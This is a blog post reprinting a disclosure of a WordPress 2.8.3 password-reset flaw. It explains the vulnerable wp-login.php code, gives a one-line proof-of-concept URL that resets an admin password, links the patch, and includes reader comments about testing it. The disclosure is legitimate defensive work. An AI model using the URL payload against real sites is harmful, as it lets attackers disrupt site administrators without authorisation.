WordPress <= 2.8.3 Remote admin reset password

How to annoy a wordpress admin? By changing his password without confirmation…

WordPress <= 2.8.3 Remote admin reset password

III. DESCRIPTION
————————-
The way WordPress handle a password reset looks like this:
You submit your email adress or username via this form
/wp-login.php?action=lostpassword ;
WordPress send you a reset confirmation like that via email:


Someone has asked to reset the password for the following site and username.
http://DOMAIN_NAME.TLD/wordpress
Username: admin
To reset your password visit the following address, otherwise just ignore
this email and nothing will happen

http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key;=o7naCKN3OoeU2KJMMsag

You click on the link, and then WordPress reset your admin password, and
sends you over another email with your new credentials.

Let’s see how it works:

wp-login.php:
…[snip]….
line 186:
function reset_password($key) {
global $wpdb;

$key = preg_replace(‘/[^a-z0-9]/i’, ”, $key);

if ( empty( $key ) )
return new WP_Error(‘invalid_key’, __(‘Invalid key’));

$user = $wpdb->get_row($wpdb->prepare(“SELECT * FROM $wpdb->users WHERE
user_activation_key = %s”, $key));
if ( empty( $user ) )
return new WP_Error(‘invalid_key’, __(‘Invalid key’));
…[snip]….
line 276:
$action = isset($_REQUEST[‘action’]) ? $_REQUEST[‘action’] : ‘login';
$errors = new WP_Error();

if ( isset($_GET[‘key’]) )
$action = ‘resetpass';

// validate action so as to default to the login screen
if ( !in_array($action, array(‘logout’, ‘lostpassword’, ‘retrievepassword’,
‘resetpass’, ‘rp’, ‘register’, ‘login’)) && false ===
has_filter(‘login_form_’ . $action) )
$action = ‘login';
…[snip]….

line 370:

break;

case ‘resetpass’ :
case ‘rp’ :
$errors = reset_password($_GET[‘key’]);

if ( ! is_wp_error($errors) ) {
wp_redirect(‘wp-login.php?checkemail=newpass’);
exit();
}

wp_redirect(‘wp-login.php?action=lostpassword&error;=invalidkey’);
exit();

break;
…[snip ]…

You can abuse the password reset function, and bypass the first step and
then reset the admin password by submiting an array to the $key variable.

IV. PROOF OF CONCEPT
————————-
A web browser is sufficiant to reproduce this Proof of concept:
http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key;[]=
The password will be reset without any confirmation.

V. BUSINESS IMPACT
————————-
An attacker could exploit this vulnerability to compromise the admin account
of any wordpress/wordpress-mu <= 2.8.3

The patch? Just a one liner fix… http://core.trac.wordpress.org/changeset/11798. The problem? They are still using blacklists instead of a whilelist of what should be accepted…

Scan your website for free:
About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.

  • http://www.blogger.com/profile/10459565444725126210 skanksinnyc

    does not work

  • http://www.blogger.com/profile/14980808976404159238 http://sucuri.net

    I was testing it over here and noticed that only works on WordPress 2.8.0, 2.8.1, 2.8.2 and 2.8.3…

    I guess they didn't test on <= 2.7 versions.

  • Anonymous

    Only works on 2.8.x versions.

  • http://www.blogger.com/profile/04955230631148691466 Lane

    I don't get it. You have to supply the email address that belongs to a registered user. Where it the hacker going to get that?

  • http://www.blogger.com/profile/05376454374607771065 BlackTigerX

    the hack is not about getting access or getting the passwod at all, just changing it

  • http://www.blogger.com/profile/04955230631148691466 Lane

    I tried the function, and it sends an email to the registered user. Unless the registered user chooses to change the password it remains the same.

  • http://www.blogger.com/profile/14980808976404159238 http://sucuri.net

    Lane:

    It only works on 2.8.x versions. It gives you the option to reset using the user name (admin only) or the email…

  • Anonymous

    It's telling the amount of kiddies trying this and failing. I can attest that it works, as I had my own blog's admin pass changed through an anon proxy, so it seems there are people actively exploiting this. I just fixed mine through the line 190 edit – thanks!

  • http://www.blogger.com/profile/04955230631148691466 Lane

    OK, I think I see how it works now. I have a blog running 2.8.3. At login, I click "Lost your password?" and am presented with a page where I can enter either a username or an email. So entering "admin" would reset the password without further action? Weird!

    I've made the Line 190 edit and will start copying it to my blogs. Thanks, Securi, for this post.

  • http://anhblog.net SEO Tips

    It's helpful. Thanks for great tips

  • Pingback: My final Wordpress security solution()

  • Mehdi Fracso

    it exists but you must have an access to the database then disclosure the login and the activation key exemple with an sql injection vulnerabilty